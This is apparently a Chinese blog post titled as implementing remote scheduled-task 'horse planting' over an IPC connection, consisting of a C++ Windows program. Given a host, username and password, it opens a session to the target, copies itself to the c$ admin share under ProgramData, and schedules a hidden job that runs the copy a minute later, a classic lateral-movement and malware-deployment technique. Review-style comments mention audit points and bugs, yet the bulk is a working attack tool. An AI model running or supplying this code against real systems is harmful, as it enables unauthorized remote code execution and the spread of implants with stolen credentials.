实现:ipc管道连接到远程计划任务种马



#pragma comment(lib, "mpr.lib")
#pragma comment(lib,"Netapi32.lib")
#include <windows.h>
#include <lm.h>
#include <tchar.h>
#include <stdio.h>
#include <Winnetwk.h>
#include <string>
#include <lmat.h>

//using namespace std;
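// Prints a human-readable description of a Win32 error code to stdout.
//
// The original mixed FormatMessageA (which writes a narrow, ANSI buffer)
// with a wchar_t* destination and a wide "%s" conversion in wprintf, so the
// message text came out as garbage. The wide FormatMessageW variant is used
// here so the buffer type and the format conversion agree.
//
// ret: a Win32 error code, e.g. the return value of WNetAddConnection2.
//      The text is looked up in the system message table; if none exists
//      for this code, only the numeric value is printed.
void GetError(DWORD ret) {
    LPWSTR pMsgBuf = nullptr;
    const DWORD len = FormatMessageW(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL, ret, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        reinterpret_cast<LPWSTR>(&pMsgBuf), 0, NULL);
    if (len == 0 || pMsgBuf == nullptr) {
        // FormatMessage failed or had no text for this code: the buffer was
        // never allocated, so do not hand an unset pointer to LocalFree.
        wprintf(L"WNetAddConnection2 failed with error: %u, %s \n", ret, L"(no description available)");
        return;
    }
    wprintf(L"WNetAddConnection2 failed with error: %u, %s \n", ret, pMsgBuf);
    LocalFree(pMsgBuf);  // buffer was allocated by FORMAT_MESSAGE_ALLOCATE_BUFFER
}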

// Entry point. Two argument forms are accepted:
//   5 args: <localname> <remotename> <username> <password>
//           maps \\<remotename> to a local device name via WNetAddConnection2.
//   4 args: <remotename> <username> <password>
//           opens a session to \\<remotename> via WNetAddConnection2 and, on
//           success, copies this program's own executable to
//           \\<remotename>\c$\ProgramData\mytask.exe and registers a job on
//           the remote host with NetScheduleJobAdd that runs
//           c:\ProgramData\mytask.exe one minute after the remote host's
//           current time (as reported by NetRemoteTOD).
// From the target host's point of view the 4-argument path produces two
// observable artifacts: a file written over the c$ administrative share and
// a job registered through the remote Schedule service; both are useful
// audit points. Returns 0 in every case except a usage error (exit(1)).
int wmain(int argc, wchar_t * argv[]) {
    /*
    DWORD WNetAddConnection2W(
        LPNETRESOURCEW lpNetResource,
        LPCWSTR        lpPassword,
        LPCWSTR        lpUserName,
        DWORD          dwFlags
    );
    
    */

    DWORD dwRetVal;
    std::wstring MyRemoteName;   // "\\\\" + <remotename>; later extended with the c$ path
    NETRESOURCE nr;
    DWORD dwFlags;

    MyRemoteName.append(L"\\\\");

    if (argc != 5 && argc != 4) {
        wprintf(L"Usage: %s <localname> <remotename> <username> <password>\n",argv[0]);
        wprintf(L"Usage: %s <remotename> <username> <password>\n",argv[0]);
        exit(1);
    }

    if (argc == 5) {
        MyRemoteName.append(argv[2]);
        wprintf(L"Calling WNetAddConnection2 with\n");
        wprintf(L"  lpLocalName = %s\n", argv[1]);
        wprintf(L"  lpRemoteName = %s\n", MyRemoteName.c_str());
        wprintf(L"  lpUsername = %s\n", argv[3]);
        // NOTE(review): the clear-text password is echoed to stdout and will
        // end up in any console capture or log.
        wprintf(L"  lpPassword = %s\n", argv[4]);
        
        memset(&nr, 0, sizeof(NETRESOURCE));

        nr.dwType = RESOURCETYPE_ANY;
        nr.lpLocalName = argv[1];
        // lpRemoteName points into MyRemoteName's buffer; valid while the
        // string is not modified.
        nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str();
        nr.lpProvider = NULL;

        dwFlags = CONNECT_TEMPORARY;  // connection type: not persisted across logons
        dwRetVal = WNetAddConnection2(&nr, argv[4], argv[3], dwFlags);
        if (dwRetVal == NO_ERROR) {
            wprintf(L"Connection added to %s\n", nr.lpRemoteName);
        }
        else {
            GetError(dwRetVal);
        }
    }
    else if (argc == 4) {
        MyRemoteName.append(argv[1]);
        wprintf(L"Calling WNetAddConnection2 with\n");
        wprintf(L"lpRemoteName = %s\n", (LPWSTR)MyRemoteName.c_str());
        wprintf(L"lpUsername = %s\n", argv[2]);
        // NOTE(review): clear-text password echoed to stdout, as in the
        // 5-argument branch.
        wprintf(L"lpPassword = %s\n", argv[3]);

        // Zero the structure before filling it in.
        memset(&nr, 0, sizeof(NETRESOURCE));


        // These four fields are the ones set for the call.
        nr.dwType = RESOURCETYPE_ANY;
        nr.lpLocalName = NULL; // no local device mapping for this form
        nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str(); // the remote resource to connect to
        nr.lpProvider = NULL;

        dwFlags = CONNECT_TEMPORARY; // connection type: not persisted across logons
        dwRetVal = WNetAddConnection2(&nr,argv[3], argv[2], dwFlags);
        if (dwRetVal == NO_ERROR){
            // Session to the remote host established.
            wprintf(L"Connection added to %s\n", nr.lpRemoteName);
            
            // RemoteFilePath holds the UNC destination path for the copy.
            std::wstring RemoteFilePath;

            // Note that append() modifies MyRemoteName in place, so
            // nr.lpRemoteName may no longer point at valid storage after
            // this line; it is not read again below.
            RemoteFilePath = MyRemoteName.append(L"\\c$\\ProgramData\\mytask.exe"); // \\<remotename>\c$\ProgramData\mytask.exe
            // Copy the running executable to the remote directory.
            wchar_t LocalModuleEXE[MAX_PATH];
            // Full path of the currently running executable. The return value
            // (0 on failure, MAX_PATH on truncation) is not checked.
            GetModuleFileName(NULL, LocalModuleEXE, MAX_PATH);
            if (CopyFile(LocalModuleEXE, RemoteFilePath.c_str(), FALSE) != 0) { // FALSE: overwrite if the file exists
                // Query the remote host's current time so the job can be
                // scheduled relative to it.
                wprintf(L"copyfile successful\n");

                // ti is allocated by NetRemoteTOD on success.
                // NOTE(review): it is never released with NetApiBufferFree.
                LPTIME_OF_DAY_INFO ti = NULL;
                std::wstring MyRemoteServerName;

                // MyRemoteServerName is the "\\<remotename>" form expected by the Net* APIs.
                MyRemoteServerName.append(L"\\\\");
                MyRemoteServerName.append(argv[1]);

                if (NetRemoteTOD(MyRemoteServerName.c_str(), (LPBYTE *)&ti) == NERR_Success) {
                    wprintf(L"Get remote time successful\n");
                    // Build the job description and register it.
                
                    //DWORD day = 1;
                    wchar_t command[] = L"c:\\ProgramData\\mytask.exe";
                    AT_INFO at; // job description for NetScheduleJobAdd
                    at.DaysOfWeek = 0;
                    at.DaysOfMonth = 0;
                    at.Flags = JOB_NONINTERACTIVE; // run without a visible desktop
                    // JobTime is milliseconds after midnight. The expression shifts the
                    // remote hour by the remote time-zone offset and targets the next
                    // minute; assumes tod_timezone is expressed in minutes — confirm
                    // against the TIME_OF_DAY_INFO documentation.
                    at.JobTime = ((ti->tod_hours + (-ti->tod_timezone) / 60) % 24) * 60 * 60 * 1000 + (ti->tod_mins + 1) * 60 * 1000;
                    at.Command = command; // command line the job runs on the remote host
                    
                    
                    DWORD id;  // job identifier returned by NetScheduleJobAdd; not printed
                    if(NetScheduleJobAdd(MyRemoteServerName.c_str(),(LPBYTE)&at,&id) == NERR_Success){
                        wprintf(L"Job add successful\n");
                    }
                    else {
                        wprintf(L"Job add failed\n");
                    }
                }
                else {
                    wprintf(L"Get remote time failed\n");
                }
            }
            else {
                wprintf(L"copyfile failed\n");
            }
        }
        else {
            GetError(dwRetVal);
        }
    }

    return 0;
}

参考文章:https://blog.csdn.net/weixin_34408624/article/details/86248485
